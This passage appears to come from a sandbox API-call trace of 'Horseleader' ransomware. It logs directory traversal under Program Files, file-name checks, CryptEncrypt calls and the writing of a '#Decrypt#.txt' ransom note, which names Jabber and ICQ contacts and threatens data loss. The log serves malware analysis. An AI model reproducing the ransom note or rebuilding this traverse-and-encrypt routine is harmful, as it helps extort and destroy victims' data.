\r\ntell your unique ID\r\n") returned 1508 [0250.905] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0250.906] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0250.906] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0250.907] CloseHandle (hObject=0x1cc) returned 1 [0250.907] 
GetProcessHeap () returned 0x780000 [0250.907] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0250.907] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="Services", cAlternateFileName="")) returned 1 [0250.907] lstrcmpiW (lpString1="Services", lpString2="Windows") returned -1 [0250.907] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Services") returned 42 [0250.907] lstrcmpW (lpString1="Services", lpString2=".") returned 1 [0250.907] lstrcmpW (lpString1="Services", lpString2="..") returned 1 [0250.907] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Services", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.908] GetProcessHeap () returned 0x780000 [0250.908] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0250.908] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Services\\*") returned 44 [0250.908] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, 
cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0250.909] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.909] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Services\\.") returned 44 [0250.909] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.909] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0250.909] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.909] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Services\\..") returned 45 [0250.909] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.909] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.909] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafbfd139, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0xafbfd139, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0xafbfd139, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xa8e, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="verisign.bmp", cAlternateFileName="")) returned 1 [0250.909] lstrcmpiW (lpString1="verisign.bmp", lpString2="Windows") returned -1 [0250.909] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp") returned 
55 [0250.910] StrStrIW (lpFirst="verisign.bmp", lpSrch=".horseleader") returned 0x0 [0250.910] lstrcmpW (lpString1="verisign.bmp", lpString2="#Decrypt#.txt") returned 1 [0250.910] lstrcmpW (lpString1="verisign.bmp", lpString2="_uninstalling_.png") returned 1 [0250.910] lstrlenW (lpString=".testttjffg") returned 11 [0250.910] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp", lpSrch=".testttjffg") returned 0x0 [0250.910] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0250.910] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0250.910] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\verisign.bmp" (normalized: "c:\\program files\\common files\\services\\verisign.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0250.911] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafbfd139, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0xafbfd139, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0xafbfd139, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xa8e, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="verisign.bmp", cAlternateFileName="")) returned 0 [0250.911] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0250.911] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Services\\#Decrypt#.txt") returned 56 [0250.911] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Services\\#Decrypt#.txt" (normalized: 
"c:\\program files\\common files\\services\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0250.912] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0250.912] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0250.913] lstrlenA (lpString="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") returned 1368 [0250.913] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0250.914] CloseHandle (hObject=0x1cc) returned 1 [0250.914] GetProcessHeap () returned 0x780000 [0250.914] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0250.914] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="SpeechEngines", cAlternateFileName="SPEECH~1")) returned 1 [0250.914] lstrcmpiW (lpString1="SpeechEngines", lpString2="Windows") returned -1 [0250.914] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines") returned 47 [0250.915] lstrcmpW (lpString1="SpeechEngines", lpString2=".") returned 1 [0250.915] lstrcmpW (lpString1="SpeechEngines", lpString2="..") returned 1 [0250.915] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.915] GetProcessHeap () returned 0x780000 [0250.915] RtlAllocateHeap (HeapHandle=0x780000, 
Flags=0x8, Size=0x840) returned 0x7dbfd8 [0250.915] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\*") returned 49 [0250.915] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0250.916] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.916] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\.") returned 49 [0250.916] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.916] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0250.916] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.916] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\..") returned 50 [0250.916] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.916] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.916] FindNextFileW (in: 
hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0250.917] lstrcmpiW (lpString1="Microsoft", lpString2="Windows") returned -1 [0250.917] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft") returned 57 [0250.917] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0250.917] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0250.917] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.917] GetProcessHeap () returned 0x780000 [0250.917] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79b628 [0250.917] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\*") returned 59 [0250.917] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0250.918] lstrcmpiW (lpString1=".", 
lpString2="Windows") returned -1 [0250.918] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\.") returned 59 [0250.919] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.919] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0250.919] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.919] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\..") returned 60 [0250.919] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.919] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.919] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="TTS20", cAlternateFileName="")) returned 1 [0250.919] lstrcmpiW (lpString1="TTS20", lpString2="Windows") returned -1 [0250.919] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20") returned 63 [0250.919] lstrcmpW (lpString1="TTS20", lpString2=".") returned 1 
[0250.919] lstrcmpW (lpString1="TTS20", lpString2="..") returned 1 [0250.919] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.920] GetProcessHeap () returned 0x780000 [0250.920] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0250.920] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*") returned 65 [0250.920] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf03fdcd7, dwReserved1=0x99178095, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0250.920] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.920] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\.") returned 65 [0250.920] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.921] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf03fdcd7, dwReserved1=0x99178095, cFileName="..", cAlternateFileName="")) returned 1 [0250.921] 
lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.921] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\..") returned 66 [0250.921] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.921] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.921] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf03fdcd7, dwReserved1=0x99178095, cFileName="en-US", cAlternateFileName="")) returned 1 [0250.921] lstrcmpiW (lpString1="en-US", lpString2="Windows") returned -1 [0250.921] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US") returned 69 [0250.921] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0250.921] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0250.921] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.922] GetProcessHeap () returned 0x780000 [0250.922] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.922] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*") returned 71 [0250.922] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, 
ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x780150, dwReserved1=0x1ff30e1e, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0250.922] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0250.922] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\.") returned 71 [0250.922] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0250.922] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x780150, dwReserved1=0x1ff30e1e, cFileName="..", cAlternateFileName="")) returned 1 [0250.923] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0250.923] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\..") returned 72 [0250.923] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0250.923] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0250.923] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd64fa49b, ftLastWriteTime.dwHighDateTime=0x1ca042b, 
nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x780150, dwReserved1=0x1ff30e1e, cFileName="enu-dsk", cAlternateFileName="")) returned 1 [0250.923] lstrcmpiW (lpString1="enu-dsk", lpString2="Windows") returned -1 [0250.923] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk") returned 77 [0250.923] lstrcmpW (lpString1="enu-dsk", lpString2=".") returned 1 [0250.923] lstrcmpW (lpString1="enu-dsk", lpString2="..") returned 1 [0250.923] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0250.923] GetProcessHeap () returned 0x780000 [0250.923] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0250.923] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*") returned 79 [0250.924] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*", lpFindFileData=0x32ae6b0 | out: lpFindFileData=0x32ae6b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, 